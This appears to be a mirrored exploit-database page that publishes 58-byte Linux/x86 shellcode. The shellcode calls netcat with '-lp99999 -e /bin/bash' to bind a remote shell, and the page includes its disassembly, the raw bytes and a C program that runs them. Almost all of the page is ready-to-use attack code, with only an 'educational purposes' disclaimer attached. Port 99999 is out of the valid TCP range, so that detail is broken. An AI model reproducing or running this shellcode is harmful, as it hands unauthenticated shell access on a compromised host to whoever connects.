Linux/x86 bind (99999/tcp) netcat traditional (/bin/nc) shell (/bin/bash) shellcode (58 bytes) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-11-13 | Type : shellcode | Platform : linux_x86
This exploit / vulnerability Linux/x86 bind (99999/tcp) netcat traditional (/bin/nc) shell (/bin/bash) shellcode (58 bytes) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

/*
# Exploit Title: Linux/x86 - execve /bin/nc -lp99999 -e /bin/bash shellcode (58 bytes)
# Exploit Description: Binds a TCP bash shell at port 99999 using netcat. Note: This shellcode uses netcat-traditional package. Otherwise, it will not work.
# Date: 04/11/2018
# Exploit Author: Javier Tello <jtelloal@gmail.com>
# Version: 1.0
# Tested on: i686 GNU/Linux
# Shellcode Length: 58 Bytes


Disassembly of section .text:

08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 6e 2f 6e 63 push $0x636e2f6e
8048068: 68 2f 2f 62 69 push $0x69622f2f
804806d: 89 e3 mov %esp,%ebx
804806f: 50 push %eax
8048070: 68 62 61 73 68 push $0x68736162
8048075: 68 62 69 6e 2f push $0x2f6e6962
804807a: 68 2d 65 2f 2f push $0x2f2f652d
804807f: 89 e2 mov %esp,%edx
8048081: 50 push %eax
8048082: 68 39 39 39 39 push $0x39393939
8048087: 68 2d 6c 70 39 push $0x39706c2d
804808c: 89 e6 mov %esp,%esi
804808e: 50 push %eax
804808f: 52 push %edx
8048090: 56 push %esi
8048091: 53 push %ebx
8048092: 89 e1 mov %esp,%ecx
8048094: 89 c2 mov %eax,%edx
8048096: b0 0b mov $0xb,%al
8048098: cd 80 int $0x80

===============poc by Javier Tello=========================
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \

"\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2d\x65\x2f\x2f\x89\xe2\x50\x68\x39\x39\x39\x39\x68\x2d\x6c\x70\x39\x89\xe6\x50\x52\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";

main() {

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}